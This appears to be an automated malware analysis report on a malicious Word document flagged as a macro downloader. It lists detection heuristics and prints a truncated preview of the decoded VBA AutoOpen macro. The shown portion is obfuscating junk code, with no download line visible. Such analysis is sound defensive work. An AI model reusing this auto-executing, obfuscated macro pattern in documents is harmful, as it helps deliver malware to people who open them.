Verdict: MALICIOUS
Risk score: 222
Malware insights
MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's obfuscated nature and the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' strongly suggest it functions as a downloader for a second-stage payload. The presence of the AutoOpen macro and the GetObject call are key indicators of this malicious behavior.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46677 bytes |

SHA-256: 50507f3c51658dc24b61a4a5e24e11b968984d4298ee2a21d7b1a06f7c114110

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
tipaWufyjUkiGe = "cIfyQeqyQix"
wYNdexumikyDu = Val("59217") & "lebyWCoz"
On Error Resume Next
Dim ciBilESUsidyyhADOfEP
ciBilESUsidyyhADOfEP = 39452
Dim TAHuVEFoluiy
bANeCanyLUNUPecodaQoTU = "mEBvOxafYlaGYLIV"
bUTofExONJIieKoTylU = 44963
For TAHuVEFoluiy = 3 To 13
Dim MONjoLozyJUDyH
MONjoLozyJUDyH = Fix(33640)
Dim xYKACYsikyY
For xYKACYsikyY = 1 To 10
Dim FYjabeieFewoGUMoPoM
FYjabeieFewoGUMoPoM = Fix(65961)
Next
Dim bEwoIZeGacEPEQ
bEwoIZeGacEPEQ = 94188
Next
nYJEmOMuxEaeqOW = "NYbpYblOdaNyP"
Dim WoFiGelem
For WoFiGelem = 3 To 11
Dim qOkmifiXaqyzofUBb
qOkmifiXaqyzofUBb = Fix(7404)
Next
cIfiaYzLyGixEPOD = "porinUPaVE"
JixoaNoJO = 56540
Dim sAhyNEVyy
For sAhyNEVyy = 10 To 13
Dim zEZExivUsENACi
zEZExivUsENACi = Fix(85725)
Next
PYSaKuFd = 58130
Dim aeLOGawEdAZibOliq
For aeLOGawEdAZibOliq = 8 To 10
Dim wyCoGeRusYqyCU
wyCoGeRusYqyCU = Fix(80989)
Next
aAtexuLeQi = "dYioPAtaPIcNuMaF"
Dim lYjUhUCOMahUToFdeHY
wYaYneSuTOq = Val("92625") & "PIMUhiccVAxOJYA"
lYjUhUCOMahUToFdeHY = 35171
SYRicOtORumDpeiY = Val("24768") & "JxOFItuPEKiVuXITOk"
PIgeVEpYiENYZuZuRIP = 77902
Dim HiXOBOZit
HiXOBOZit = 26854
Dim ROLEfODicuw
lGYiAxAiyNAPYrExO = "PArYgaKEjY"
Dim LoDacYpIPOhxUzyNewi
LoDacYpIPOhxUzyNewi = 95515
ROLEfODicuw = 18628
kOHOmUheDEJIdAaluN = Val("34465") & "gLegACIQaQulUgEJ"
pUrACYmUIQocYXYvas = Val("38836") & "QiGLYkUfiZIgoWytAwir"
xiHACOBEBeTePizyxOPIZ = 49585
XShUkOewfI = "dhowekirigArIGIQef"
gEVEsAkADEpeciqEna = StrReverse(LTrim(""))
tECUaiiiTetOXUXYSi = "hiZUXEpEdat"
Dim ZyfeiukyHEgEVyDYKereRu
ZyfeiukyHEgEVyDYKereRu = 26120
kypEdeluraresagIdusu = Val("72617") & "SIFYliRiiyDEbNudUfyN"
MoaEXImUTwsAzy = 94588
JuCusItoDINEIDaByGuk = "SosYJAKADIHaT"
teivIJALOfoS = 48982
Dim pUNUQuGEo
pUNUQuGEo = 10956
PNaLuKItylUvowORo = "btOQEiaRaJekuQUk"
Dim XupeaogofuKIUpYha
For XupeaogofuKIUpYha = 5 To 11
Dim wUJyhygaPoBeWaGuL
wUJyhygaPoBeWaGuL = Fix(66024)
Next
VOHaHEDAi = 38102
Dim rOnYaifNa
Dim sACEHiJoZYNUwoNUia
sACEHiJoZYNUwoNUia = 23035
rOnYaifNa = 78147
GOXUdYHEXYTIK = 57463
Dim ehYHOaeveVIdERYJ
For ehYHOaeveVIdERYJ = 3 To 13
Dim XODATiTYAFiwjExAb
XODATiTYAFiwjExAb = Fix(66366)
Next
FEaUTejyZU = Val("36833") & "pixePyjAg"
Dim MyzTaLuUHIFiMUFYu
For MyzTaLuUHIFiMUFYu = 7 To 11
Dim RowobiWOJopABUJo
RowobiWOJopABUJo = Fix(59035)
Next
Dim iYkEjaDoronARuHxezIJ
iYkEjaDoronARuHxezIJ = 68854
Dim ZyPkeSEaOfiZIRiraZ
ZyPkeSEaOfiZIRiraZ = 82522
tIpOsEGeKUNoXaPin = Val("37786") & "LObYJyGaaIqaCuaUFEPaK"
XohIqiSiZeZiJ = "CUlOBEPeTFypAfQu"
Dim xUnOBykIwUGARIsyqIaYmi
For xUnOBykIwUGARIsyqIaYmi = 5 To 10
Dim vuJITuTIZOSaRIsi
vuJITuTIZOSaRIsi = Fix(16998)
DPiDadOVOt = 59064
LYMaVuWarCIhIhwo = 1214
Next
Dim aOMidefekeLy
aOMidefekeLy = 25582
Dim FaQKosOB
FaQKosOB = 10567
tAjeRymANaKuMENbemyzO = "gEbTiMoKy"
Dim iaKoGAGipHOfysloWA
iaKoGAGipHOfysloWA = 86703
Dim FezokYvebuvEmyrIXoCUko
FezokYvebuvEmyrIXoCUko = 44278
iifeZXyp = 48029
GiCeBiCEJi = 76636
KereQobazoZIVFzaZozY = 76882
Dim WIkoQovHIPommuaoHuT
For WIkoQovHIPommuaoHuT = 3 To 12
Dim cYdyjOVEkipExEnANIL
cYdyjOVEkipExEnANIL = Fix(89631)
Next
ZaciDIPakoVaziNU = "bOdZYGitl"
Dim mEFEhANEiOFahuBeJyP
mEFEhANEiOFahuBeJyP = 66317
Dim EzuiEcoTYRUnuS
For EzuiEcoTYRUnuS = 3 To 12
Dim ZAlIFoKykoVAcITYRYSE
ZAlIFoKykoVAcITYRYSE = Fix(99781)
Next
Dim BUNyZADoaaBEwKENUSun
For BUNyZADoaaBEwKENUSun = 9 To 11
Dim TYTOVQowYNiceXaiIC
TYTOVQowYNiceXaiIC = Fix(722)
Next
KYvufObycyromR = 2039
Dim ToKotovavAR
Dim hUnItIHiPExosEvi
For hUnItIHiPExosEvi = 9 To 11
Dim wYMATOLoNYPepEc
wYMATOLoNYPepEc = Fix(6031)
Next
kuJIxUxakUjmyNliFve = "ZEJEKEjaaEgalUraEPPa"
iEgUwesOYFigYKY = "reNyKITOHOT"
For ToKotovavAR =
... (truncated)